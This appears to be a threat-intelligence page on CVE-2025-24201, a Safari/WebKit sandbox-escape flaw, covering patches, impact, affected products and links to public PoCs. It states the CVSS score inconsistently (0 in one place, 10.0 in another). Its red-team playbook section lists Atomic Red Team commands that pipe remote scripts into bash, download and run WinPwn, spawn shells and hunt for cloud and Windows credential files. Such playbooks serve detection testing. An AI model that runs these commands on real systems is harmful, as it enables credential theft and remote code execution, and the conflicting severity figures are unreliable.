CVE-2025-24201
Overview
This vulnerability is an out-of-bounds write occurring within the Apple Safari web content processing component. The root cause lies in insufficient boundary checks during memory write operations, which allow data to be written outside the intended buffer limits. This flaw affects the Web Content sandbox mechanism in Safari and related Apple operating systems, compromising the integrity of memory management within the browser's rendering engine.
Vulnerability Description
An out-of-bounds write issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in Safari 18.3.1, iOS 15.8.4 and iPadOS 15.8.4, iOS 16.7.11 and iPadOS 16.7.11, iOS 18.3.2 and iPadOS 18.3.2, iPadOS 17.7.6, macOS Sequoia 15.3.2, visionOS 2.3.2, watchOS 11.4. Maliciously crafted web content may be able to break out of Web Content sandbox. This is a supplementary fix for an attack that was blocked in iOS 17.2. (Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2.).
Impact
An attacker can leverage this vulnerability to break out of the Web Content sandbox, potentially executing unauthorized actions or manipulating memory in the Safari browser environment. Exploitation requires user interaction with malicious web content but does not require authentication or elevated privileges. Successful exploitation could lead to targeted attacks against specific individuals, as observed in sophisticated campaigns. The CVSS score of 0 reflects low severity, but the vulnerability has been reportedly exploited in targeted scenarios prior to iOS 17.2, indicating a real-world impact on confidentiality and sandbox isolation.
Solution
Apple has addressed this vulnerability in Safari 18.3.1 and corresponding OS updates including iOS 15.8.4, iPadOS 15.8.4, iOS 16.7.11, iPadOS 16.7.11, iOS 18.3.2, iPadOS 18.3.2, iPadOS 17.7.6, macOS Sequoia 15.3.2, visionOS 2.3.2, and watchOS 11.4. Users and administrators should apply the latest updates from Apple as detailed in the official advisories available at https://support.apple.com/en-us/122281, https://support.apple.com/en-us/122283, and https://support.apple.com/en-us/122284. No alternative workarounds are documented; patching is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An out-of-bounds write vulnerability in Apple's web browser and operating systems can lead to severe security risks, primarily by allowing maliciously crafted web content to escape the confines of the Web Content sandbox. This sandboxing mechanism is designed to isolate web processes from the underlying operating system and other applications, thereby limiting the potential damage that can be inflicted by compromised web pages. However, the existence of this vulnerability indicates that an attacker could manipulate memory allocation, potentially overwriting critical data structures and executing arbitrary code. The flaw underscores the importance of rigorous memory management and the need for robust checks to prevent unauthorized access to system resources.
Attack vectors for this vulnerability primarily involve the exploitation of web content. An attacker could create a specially crafted webpage that, when visited by a user, triggers the out-of-bounds write condition. This could lead to the execution of malicious code within the context of the user’s session, allowing for actions such as data theft, unauthorized access to sensitive information, or even full system compromise. The sophistication of such attacks can vary, with targeted individuals being at higher risk, particularly if they are using affected versions of iOS or macOS. The potential for exploitation in the wild, especially against high-value targets, raises significant concerns about the security of users and the integrity of their devices.
The real-world impact of this vulnerability is considerable, especially given the critical nature of the affected products. Apple’s ecosystem, which includes iPhones, iPads, Macs, and other devices, is widely used in both personal and business environments. A successful exploitation could lead to data breaches, loss of sensitive information, and reputational damage for organizations. Businesses that rely on Apple products must consider the implications of such vulnerabilities on their operational security and the potential financial repercussions of a breach. The high CVSS score of 10.0 indicates that this vulnerability poses a critical risk, necessitating immediate attention and remediation.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular updates and patches from Apple should be applied promptly to ensure that devices are protected against known vulnerabilities. Additionally, employing intrusion detection systems can help identify unusual behavior indicative of exploitation attempts. User education is also crucial; individuals should be made aware of the risks of visiting untrusted websites and the importance of maintaining updated software. Furthermore, organizations should consider implementing application whitelisting and other endpoint protection measures to limit the execution of unauthorized applications.
In conclusion, the out-of-bounds write vulnerability presents a significant threat to users of Apple’s web browser and operating systems. The potential for exploitation through crafted web content highlights the need for ongoing vigilance in cybersecurity practices. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities. The evolving landscape of cyber threats necessitates a proactive approach to security, ensuring that both individuals and businesses remain resilient against sophisticated attacks.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-24201, rising by over 160% despite a concurrent significant reduction in detection activity reported by our telemetry. This divergence suggests that while active exploitation attempts may have become less frequent or more covert, the vulnerability remains highly attractive to threat actors, as evidenced by the emergence of new proof-of-concept exploits publicly available on GitHub. Notably, the availability of a zero-click remote code execution chain leveraging this vulnerability in combination with CVE-2025-24085 underscores its potential for sophisticated, user-interaction-free attacks capable of full device compromise. Although ransomware use linked to this vulnerability remains unconfirmed, the increased EPSS score and evolving exploit landscape elevate the risk profile, signaling that defenders should anticipate more targeted and stealthy exploitation attempts. Consequently, the threat level for CVE-2025-24201 should be considered elevated, reflecting a persistent and adaptable adversary interest despite reduced overt detection signals.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Visionos | All |
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
|
|
|
Apple | Watchos | All |
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
The-Maxu/CVE-2025-24201-WebKit-Vulnerability-Detector-PoC-
CVE-2025-24201 WebKit Vulnerability Detector (PoC)
|
The-Maxu | 6 | 1 | 2025-07-11 | View |
|
5ky9uy/glass-cage-i18-2025-24085-and-cve-2025-24201
Glass Cage is a zero-click PNG-based RCE chain in iOS 18.2.1, exploiting WebKit (CVE-2025-24201) and Core Media (CVE-202...
|
5ky9uy | 5 | 1 | 2025-08-30 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.